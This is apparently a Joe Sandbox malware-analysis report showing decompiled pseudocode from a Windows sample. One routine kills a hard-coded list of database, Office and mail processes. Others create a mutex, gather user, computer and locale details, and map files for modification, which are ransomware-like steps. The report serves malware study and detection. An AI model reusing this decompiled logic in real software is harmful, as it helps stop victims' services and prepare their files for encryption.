API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
API String ID: 139215849-2398311915
Opcode ID: eb037162c0048f6df9b1cb0cac19cc7073349f9e1c05b6a7186251e801c67086
Instruction ID: 88cc11763d087ac1aa438eab817a88afa97e49b96682c2bd2b31bea430a81724
Opcode Fuzzy Hash: eb037162c0048f6df9b1cb0cac19cc7073349f9e1c05b6a7186251e801c67086
Instruction Fuzzy Hash: B441D57020C300ABEB00DF60DD59B6B7BECEF85715F041428B545D7282DB78E909CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0F6948C0 Relevance: 15.1, APIs: 10, Instructions: 114
processmemorystringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0F6948C0() {
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				char* _v76;
				char* _v80;
				char* _v84;
				char* _v88;
				char* _v92;
				char* _v96;
				char* _v100;
				char* _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				char* _v156;
				char* _v160;
				char* _v164;
				void* _v172;
				void* _t49;
				void* _t50;
				int _t51;
				int _t52;
				int _t53;
				void* _t60;
				WCHAR* _t62;
				void* _t65;
				void* _t70;
				signed int _t71;
				void* _t72;
				signed int _t74;
				void* _t76;

				_t76 = (_t74 & 0xfffffff8) - 0xa4;
				_v164 = L"msftesql.exe";
				_v160 = L"sqlagent.exe";
				_v156 = L"sqlbrowser.exe";
				_v152 = L"sqlservr.exe";
				_v148 = L"sqlwriter.exe";
				_v144 = L"oracle.exe";
				_v140 = L"ocssd.exe";
				_v136 = L"dbsnmp.exe";
				_v132 = L"synctime.exe";
				_v128 = L"mydesktopqos.exe";
				_v124 = L"agntsvc.exeisqlplussvc.exe";
				_v120 = L"xfssvccon.exe";
				_v116 = L"mydesktopservice.exe";
				_v112 = L"ocautoupds.exe";
				_v108 = L"agntsvc.exeagntsvc.exe";
				_v104 = L"agntsvc.exeencsvc.exe";
				_v100 = L"firefoxconfig.exe";
				_v96 = L"tbirdconfig.exe";
				_v92 = L"ocomm.exe";
				_v88 = L"mysqld.exe";
				_v84 = L"mysqld-nt.exe";
				_v80 = L"mysqld-opt.exe";
				_v76 = L"dbeng50.exe";
				_v72 = L"sqbcoreservice.exe";
				_v68 = L"excel.exe";
				_v64 = L"infopath.exe";
				_v60 = L"msaccess.exe";
				_v56 = L"mspub.exe";
				_v52 = L"onenote.exe";
				_v48 = L"outlook.exe";
				_v44 = L"powerpnt.exe";
				_v40 = L"steam.exe";
				_v36 = L"sqlservr.exe";
				_v32 = L"thebat.exe";
				_v28 = L"thebat64.exe";
				_v24 = L"thunderbird.exe";
				_v20 = L"visio.exe";
				_v16 = L"winword.exe";
				_v12 = L"wordpad.exe";
				_t49 = CreateToolhelp32Snapshot(2, 0); // executed
				_t70 = _t49;
				_v172 = _t70;
				_t50 = VirtualAlloc(0, 0x22c, 0x3000, 4); // executed
				_t60 = _t50;
				if(_t60 != 0) {
					 *_t60 = 0x22c;
					if(_t70 != 0xffffffff) {
						_push(_t60);
						Process32FirstW(_t70); // executed
					}
				}
				_t41 = _t60 + 0x24; // 0x24
				_t62 = _t41;
				do {
					_t71 = 0;
					do {
						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
						if(_t51 == 0) {
							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
							if(_t65 != 0) {
								TerminateProcess(_t65, 0);
								CloseHandle(_t65);
							}
						}
						_t71 = _t71 + 1;
						_t46 = _t60 + 0x24; // 0x24
						_t62 = _t46;
					} while (_t71 < 0x27);
					_t72 = _v172;
					_t52 = Process32NextW(_t72, _t60);
					_t48 = _t60 + 0x24; // 0x24
					_t62 = _t48;
				} while (_t52 != 0);
				if(_t60 != 0) {
					VirtualFree(_t60, 0, 0x8000); // executed
				}
				_t53 = FindCloseChangeNotification(_t72); // executed
				return _t53;
			}

0x0f6948c6
0x0f6948d3
0x0f6948db
0x0f6948e3
0x0f6948eb
0x0f6948f3
0x0f6948fb
0x0f694903
0x0f69490b
0x0f694913
0x0f69491b
0x0f694923
0x0f69492b
0x0f694933
0x0f69493b
0x0f694943
0x0f69494b
0x0f694953
0x0f69495b
0x0f694963
0x0f69496b
0x0f694973
0x0f69497b
0x0f694983
0x0f69498b
0x0f694993
0x0f69499b
0x0f6949a3
0x0f6949ae
0x0f6949b9
0x0f6949c4
0x0f6949cf
0x0f6949da
0x0f6949e5
0x0f6949f0
0x0f6949fb
0x0f694a06
0x0f694a11
0x0f694a1c
0x0f694a27
0x0f694a32
0x0f694a44
0x0f694a48
0x0f694a4c
0x0f694a52
0x0f694a56
0x0f694a58
0x0f694a61
0x0f694a63
0x0f694a65
0x0f694a65
0x0f694a61
0x0f694a71
0x0f694a71
0x0f694a74
0x0f694a74
0x0f694a80
0x0f694a85
0x0f694a8d
0x0f694a9b
0x0f694a9f
0x0f694aa4
0x0f694ab1
0x0f694ab1
0x0f694a9f
0x0f694abb
0x0f694abc
0x0f694abc
0x0f694abf
0x0f694ac4
0x0f694aca
0x0f694ad0
0x0f694ad0
0x0f694ad3
0x0f694ad9
0x0f694ae3
0x0f694ae3
0x0f694aea
0x0f694af2

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0F694A32
VirtualAlloc.KERNEL32(00000000,0000022C,00003000,00000004), ref: 0F694A4C
Process32FirstW.KERNEL32(00000000,00000000), ref: 0F694A65
lstrcmpiW.KERNEL32(00000002,00000024), ref: 0F694A85
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0F694A95
TerminateProcess.KERNEL32(00000000,00000000), ref: 0F694AA4
CloseHandle.KERNEL32(00000000), ref: 0F694AB1
Process32NextW.KERNEL32(?,00000000), ref: 0F694ACA
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F694AE3
FindCloseChangeNotification.KERNEL32(?), ref: 0F694AEA

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: CloseProcessProcess32Virtual$AllocChangeCreateFindFirstFreeHandleNextNotificationOpenSnapshotTerminateToolhelp32lstrcmpi
String ID:
API String ID: 3023235786-0
Opcode ID: e2416cbf5237999326fa66eef8fbc24ad6dc76f5a7d1b4d5d8161014272cca44
Instruction ID: faf728a96f0a2742275fca530d604ec41280a48077282b29fb7db38c4bc4b906
Opcode Fuzzy Hash: e2416cbf5237999326fa66eef8fbc24ad6dc76f5a7d1b4d5d8161014272cca44
Instruction Fuzzy Hash: 7B5138B510C3809FDB208F55984875BBBFCEB81719F62890CE598DB252CB719819CFDA

Uniqueness

Uniqueness Score: -1.00%

Function 0F6947D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83stringmemorysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0F693BC0: GetProcessHeap.KERNEL32(?,?,0F694807,00000000,?,00000000,00000000), ref: 0F693C5C

Part of subcall function 0F697490: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F6974B7
Part of subcall function 0F697490: GetUserNameW.ADVAPI32(00000000,?), ref: 0F6974C8
Part of subcall function 0F697490: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F6974E6
Part of subcall function 0F697490: GetComputerNameW.KERNEL32 ref: 0F6974F0
Part of subcall function 0F697490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F697510
Part of subcall function 0F697490: wsprintfW.USER32 ref: 0F697551
Part of subcall function 0F697490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F69756E
Part of subcall function 0F697490: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F697592
Part of subcall function 0F697490: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F694810,?), ref: 0F6975B6
Part of subcall function 0F697490: RegCloseKey.KERNEL32(00000000), ref: 0F6975D2

Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F6972F2
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F6972FD
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697313
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F69731E
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697334
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F69733F
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697355
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(0F694B36,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697360
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697376
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697381
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697397
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F6973A2
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F6973C1
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F6973CC

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F69482C
lstrcpyW.KERNEL32 ref: 0F69484F
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F694856
CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F69486E
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F69487A
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F694881
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F69489B

Strings

Global\, xrefs: 0F694849

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
String ID: Global\
API String ID: 3131499543-188423391
Opcode ID: b391eb24800098cafd4b194dc48542fa5b507bbb5cd82aa11acae6821dc761ce
Instruction ID: 137a9cfb3d0c9dc306443b0079292031dc10d441f2d4353ece72fb0fcfa54219
Opcode Fuzzy Hash: b391eb24800098cafd4b194dc48542fa5b507bbb5cd82aa11acae6821dc761ce
Instruction Fuzzy Hash: 522187712683117BEA24EB64CD4AF7F7B9CDB40B55F400228F605A71C1AE98BD05C3E9

Uniqueness

Uniqueness Score: -1.00%

Function 0F6935C0 Relevance: 13.6, APIs: 9, Instructions: 94
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F6935C0(intOrPtr __ecx, intOrPtr __edx) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				long _v24;
				void* _t12;
				void* _t14;
				long _t17;
				void* _t18;
				int _t21;
				void* _t25;
				char* _t29;
				void* _t37;
				void* _t39;

				_v16 = __edx;
				_v20 = __ecx;
				_v12 = 0;
				_t12 = VirtualAlloc(0, 0xa00, 0x3000, 4); // executed
				_t39 = _t12;
				if(_t39 != 0) {
					GetModuleFileNameW(0, _t39, 0x100);
					_t14 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0, 0); // executed
					_t37 = _t14;
					if(_t37 != 0xffffffff) {
						_t17 = GetFileSize(_t37, 0);
						_v8 = _t17;
						_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
						_t25 = _t18;
						if(_t25 != 0) {
							_t21 = ReadFile(_t37, _t25, _v8,  &_v24, 0); // executed
							if(_t21 != 0) {
								_t29 = _v8 - 1 + _t25;
								if( *_t29 != 0) {
									do {
										_t29 = _t29 - 1;
									} while ( *_t29 != 0);
									E0F6934F0(_t29 + 1, _v20, _v16);
									_t32 =  !=  ? 1 : 0;
									_v12 =  !=  ? 1 : 0;
								}
							}
							VirtualFree(_t25, 0, 0x8000); // executed
						}
						FindCloseChangeNotification(_t37); // executed
					}
					VirtualFree(_t39, 0, 0x8000); // executed
					return _v12;
				} else {
					return _t12;
				}
			}

0x0f6935dc
0x0f6935df
0x0f6935e2
0x0f6935e9
0x0f6935eb
0x0f6935ef
0x0f693600
0x0f693616
0x0f69361c
0x0f693621
0x0f693626
0x0f693636
0x0f693639
0x0f69363b
0x0f69363f
0x0f69364c
0x0f693654
0x0f69365a
0x0f69365f
0x0f693661
0x0f693661
0x0f693662
0x0f69366e
0x0f69367f
0x0f693682
0x0f693682
0x0f69365f
0x0f69368d
0x0f69368d
0x0f693694
0x0f693694
0x0f6936a2
0x0f6936b1
0x0f6935f6
0x0f6935f6
0x0f6935f6

APIs

VirtualAlloc.KERNEL32(00000000,00000A00,00003000,00000004,?,74CB6980), ref: 0F6935E9
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100,74CF82B0), ref: 0F693600
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0F693616
GetFileSize.KERNEL32(00000000,00000000), ref: 0F693626
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F693639
ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0F69364C
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F69368D
FindCloseChangeNotification.KERNEL32(00000000), ref: 0F693694
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F6936A2

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: FileVirtual$AllocFree$ChangeCloseCreateFindModuleNameNotificationReadSize
String ID:
API String ID: 511603811-0
Opcode ID: d86783ab6bb6e94c7ed8785c2aca836896ae4281cb58bac67900c5652869f390
Instruction ID: c44964961b549d4dde8af8e1bb8cf65f82c97fe326bd5ba23790fdc1c687f03d
Opcode Fuzzy Hash: d86783ab6bb6e94c7ed8785c2aca836896ae4281cb58bac67900c5652869f390
Instruction Fuzzy Hash: 5F21C9317443047BFB255FA49C87FAE7BACEB45B25F200058FB05AA3C1CAB995119758

Uniqueness

Uniqueness Score: -1.00%

Function 0F697D70 Relevance: 12.6, APIs: 10, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F697D70(intOrPtr* __ecx) {
				int _t20;
				intOrPtr* _t24;

				_t24 = __ecx;
				if( *__ecx != 0) {
					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
				}
				return _t20;
			}

0x0f697d71
0x0f697d7d
0x0f697d89
0x0f697d89
0x0f697d8f
0x0f697d9b
0x0f697d9b
0x0f697da1
0x0f697dad
0x0f697dad
0x0f697db3
0x0f697dbf
0x0f697dbf
0x0f697dc5
0x0f697dd1
0x0f697dd1
0x0f697dd7
0x0f697de3
0x0f697de3
0x0f697de9
0x0f697df5
0x0f697df5
0x0f697dfb
0x0f697e07
0x0f697e07
0x0f697e0d
0x0f697e19
0x0f697e19
0x0f697e22
0x00000000
0x0f697e31
0x0f697e35

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F6948AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F697D89
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F6948AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F697D9B
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0F6948AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F697DAD
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F6948AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F697DBF
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F6948AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F697DD1
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F6948AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F697DE3
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F6948AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F697DF5
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F6948AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F697E07
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0F6948AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F697E19
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F6948AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F697E31

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 0e9488265e92eaafd1574e101f04692614302b4ac62668ae3f37dd742f4a76fd
Instruction ID: c384eb0466a89560b968574f587191b78f4b9ef425c8fce299d68087616a6da9
Opcode Fuzzy Hash: 0e9488265e92eaafd1574e101f04692614302b4ac62668ae3f37dd742f4a76fd
Instruction Fuzzy Hash: DE21EF30294B04AAEB761A15DC0AFA6B2E5FF40B05F655A3CE2C1249F18BF57499DF08

Uniqueness

Uniqueness Score: -1.00%

Function 0F692890 Relevance: 12.1, APIs: 8, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0F692890(WCHAR* __ecx, intOrPtr __edx) {
				long _v8;
				intOrPtr _v12;
				void* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t9;
				signed int _t14;
				void* _t18;
				void* _t19;
				void* _t23;
				struct _SECURITY_ATTRIBUTES* _t24;
				WCHAR* _t29;
				void* _t34;
				signed int _t35;
				long _t37;
				void* _t38;
				void* _t40;

				_t29 = __ecx;
				_t28 = 0;
				_v12 = __edx;
				_t9 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0); // executed
				_t34 = _t9;
				if(_t34 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_v8 = GetFileSize(_t34, 0);
					E0F693030(0, _t34, _t35); // executed
					asm("sbb esi, esi");
					_t37 = (_t35 & 0x00000003) + 1;
					_t14 = E0F693030(0, _t34, _t37);
					asm("sbb eax, eax");
					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0); // executed
					_v16 = _t18;
					if(_t18 != 0) {
						_t19 = MapViewOfFile(_t18, _t37, 0, 0, 0); // executed
						_t38 = _t19;
						if(_t38 != 0) {
							_t23 = E0F693030(0, _t34, _t38); // executed
							if(_t23 == 0) {
								_push(_t29);
								_t4 = _t38 + 0x53; // 0x53
								_t29 = _t4;
								_t5 = _t23 + 6; // 0x6, executed
								E0F698400(_t29, _t5); // executed
								_t40 = _t40 + 4;
							}
							_push(_t29);
							_t24 = E0F692830(_v12, _t38, _v8); // executed
							_t28 = _t24;
							UnmapViewOfFile(_t38);
						}
						CloseHandle(_v16);
						CloseHandle(_t34);
						return _t28;
					} else {
						CloseHandle(_t34);
						goto L3;
					}
				}
			}

0x0f692890
0x0f692899
0x0f69289b
0x0f6928ab
0x0f6928b1
0x0f6928b6
0x0f6928f9
0x0f692901
0x0f6928b8
0x0f6928c0
0x0f6928c3
0x0f6928ca
0x0f6928cf
0x0f6928d0
0x0f6928d8
0x0f6928e5
0x0f6928eb
0x0f6928f0
0x0f69290a
0x0f692910
0x0f692914
0x0f692916
0x0f69291d
0x0f69291f
0x0f692920
0x0f692920
0x0f692923
0x0f692926
0x0f69292b
0x0f69292b
0x0f69292e
0x0f692937
0x0f69293f
0x0f692942
0x0f692942
0x0f692951
0x0f692954
0x0f69295e
0x0f6928f2
0x0f6928f3
0x00000000
0x0f6928f3
0x0f6928f0

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,74CF82B0,00000000,?,?,0F692C02), ref: 0F6928AB
GetFileSize.KERNEL32(00000000,00000000,?,?,0F692C02), ref: 0F6928BA
CreateFileMappingW.KERNELBASE(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,0F692C02), ref: 0F6928E5
CloseHandle.KERNEL32(00000000,?,?,0F692C02), ref: 0F6928F3
MapViewOfFile.KERNEL32(00000000,74CF82B1,00000000,00000000,00000000,?,?,0F692C02), ref: 0F69290A
UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,0F692C02), ref: 0F692942
CloseHandle.KERNEL32(?,?,?,0F692C02), ref: 0F692951
CloseHandle.KERNEL32(00000000,?,?,0F692C02), ref: 0F692954

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateView$MappingSizeUnmap
String ID:
API String ID: 265113797-0
Opcode ID: 3bb54f80d4c688dda17d6b66ec548d146c3d50011c5ddef205de29d929e5f822
Instruction ID: d1973a8d0d527d1747562dd97d2ade45f128c423247d7ae9e5e707f06b50f460
Opcode Fuzzy Hash: 3bb54f80d4c688dda17d6b66ec548d146c3d50011c5ddef205de29d929e5f822
Instruction Fuzzy Hash: D6215BB1A152187FEB106FB49C85F7F77ACEB45676F000228FC01E3281EA399C2146B0

Uniqueness

Uniqueness Score: -1.00%

Function 0F694A78 Relevance: 10.5, APIs: 7, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F694A78(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
				int _t8;
				int _t9;
				int _t10;
				void* _t15;
				WCHAR* _t17;
				void* _t18;
				signed int _t23;
				void* _t24;
				void* _t28;

				_t17 = __ecx;
				_t15 = __ebx;
				while(1) {
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
					if(_t23 < 0x27) {
						continue;
					}
					L7:
					_t24 = _a12;
					_t9 = Process32NextW(_t24, _t15);
					_t7 = _t15 + 0x24; // 0x24
					_t17 = _t7;
					if(_t9 != 0) {
						_t23 = 0;
						do {
							goto L2;
						} while (_t23 < 0x27);
						goto L7;
					}
					if(_t15 != 0) {
						VirtualFree(_t15, 0, 0x8000); // executed
					}
					_t10 = FindCloseChangeNotification(_t24); // executed
					return _t10;
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
				}
			}

0x0f694a78
0x0f694a78
0x0f694a80
0x0f694a80
0x0f694a85
0x0f694a8d
0x0f694a9b
0x0f694a9f
0x0f694aa4
0x0f694ab1
0x0f694ab1
0x0f694a9f
0x0f694abb
0x0f694abc
0x0f694abc
0x0f694ac2
0x00000000
0x00000000
0x0f694ac4
0x0f694ac4
0x0f694aca
0x0f694ad0
0x0f694ad0
0x0f694ad5
0x0f694a74
0x0f694a80
0x00000000
0x00000000
0x00000000
0x0f694a80
0x0f694ad9
0x0f694ae3
0x0f694ae3
0x0f694aea
0x0f694af2
0x0f694a80
0x0f694a85
0x0f694a8d
0x0f694a9b
0x0f694a9f
0x0f694aa4
0x0f694ab1
0x0f694ab1
0x0f694a9f
0x0f694abb
0x0f694abc
0x0f694abc
0x0f694abf

APIs

lstrcmpiW.KERNEL32(00000002,00000024), ref: 0F694A85
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0F694A95
TerminateProcess.KERNEL32(00000000,00000000), ref: 0F694AA4
CloseHandle.KERNEL32(00000000), ref: 0F694AB1
Process32NextW.KERNEL32(?,00000000), ref: 0F694ACA
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F694AE3
FindCloseChangeNotification.KERNEL32(?), ref: 0F694AEA

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

